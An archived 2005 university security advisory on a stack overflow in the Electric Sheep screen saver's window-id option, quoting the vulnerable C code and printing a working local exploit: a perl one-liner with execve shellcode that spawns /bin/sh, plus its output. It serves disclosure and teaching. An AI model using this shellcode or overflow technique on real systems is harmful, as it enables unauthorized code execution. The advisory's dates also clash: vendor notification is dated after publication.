<<< Date Index >>>     <<< Thread Index >>>

Electric Sheep window-id stack overflow



 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 Polytechnic University ISIS Security Advisory              PUISIS10202005
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                                      http://isis.poly.edu
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 ~ Application: Electric Sheep v2.6.3
 ~    Severity: Normal
 ~       Title: Electric Sheep window-id stack overflow
 ~        Date: October 20, 2005
 ~          ID: PUISIS10202005
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Summary
 =======
 Due to insufficient bounds checking, a lengthy window-id parameter can 
 cause a stack based buffer overflow to occur allowing execution of 
 arbitrary code with the privileges of the invoking user. This could 
 potentially be used as a backdoor entry point.

 Background
 ==========
 "Electric Sheep is a free, open source screen saver run by thousands of 
 people all over the  world. It can be installed on any ordinary PC or
 Mac. When these computers "sleep", the screen saver comes on and the 
 computers communicate with each other by the internet to share the work
 of creating morphing abstract animations known as "sheep". 
 http://electricsheep.org/           

 Description
 ===========
 electricsheep.c 

 419: 
  default_background(char *more) {
    char ob[MAXBUF];
    char pbuf[MAXBUF];
    char qbuf[MAXBUF];

    if (nobg || (!on_root && !window_id)) return;
    if (more)
        sprintf(ob, "-merge -at 500,0 s.tif",
                splash_prefix, more);
    else
        ob[0] = 0;

    if (window_id)              
      sprintf(qbuf, "-windowid %s", window_id); //no bounds checking on qbuf 

 Because window_id comes directly from the command line, a malicious
 user has the potential to supply a window_id larger than MAXBUF and 
 corrupt sorrounding memory. The vulnerability can be seen by executing 
 the following command.

  electricsheep -window-id `perl -e '{print "A"x"40000";}'`

  Bad integer argument for the windowid option
  Usage: xsetbg [global options] {[image options] image_name ...}
  Type `xsetbg -help [option ...]' for information on a particular option, or
  `xsetbg -help' to enter the interactive help facility.
  subprocess failure: splash0, 256=1<<8+0
  Segmentation fault

 An exploit spawing /bin/sh on SUSE Linux

  narain@(none):~/electricsheep-2.6.3> electricsheep -window-id `perl -
  e '{print "\x90"x"200"; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
  \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb
  \x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; print "B"x"532";print
  "\x80\xc4\xfd\xbf"; print "C"x"39219";}'`

  Bad integer argument for the windowid option

  Usage: xsetbg [global options] {[image options] image_name ...}

  Type `xsetbg -help [option ...]' for information on a particular option, or
  `xsetbg -help' to enter the interactive help facility.
  subprocess failure: splash0, 256=1<<8+0
  sh-3.00$ whoami
  narain
  sh-3.00$ 


 Impact
 ======
 This local exploit to the sheep client does not pose a significant
 threat as electricsheep does not setuid(0). However, local exploits
 may be used as mechanisms for subvert command execution once a system
 has been compromised or used to create backdoors.

 Workaround
 ==========
 The vendor was notified on November 18, 2005. The vendor was extremely
 responsive and cooperative in regards to these security issues. All
 issues are fixed in the CVS HEAD of Electric Sheep client development
 and will be included in the next release.

 About 
 =====
 The Information Systems and Internet Security (ISIS) Laboratory is 
 an NSF funded laboratory designed to facilitate hands-on 
 experimentation and project work in issues related to information 
 security.  It provides the focus for multidisciplinary research and 
 education in emerging areas of security. Polytechnic University, an 
 NSA Center of Academic Excellence in Information Assurance Education, 
 houses the lab.

 This vulnerability was discovered during coursework performed for 
 "Penetration Testing & Vulnerability Analysis" offered at 
 Polytechnic University (http://www.poly.edu) during the Fall 2005 
 semester.

 License
 =======
 The contents of this document are licensed under the
 Creative Commons - Attribution / Share Alike license.
 http://creativecommons.org/licenses/by-sa/2.5

 Authors
 =======
 Michael Aiello http://www.michaelaiello.com
 Daniel Guido dguido@xxxxxxxxx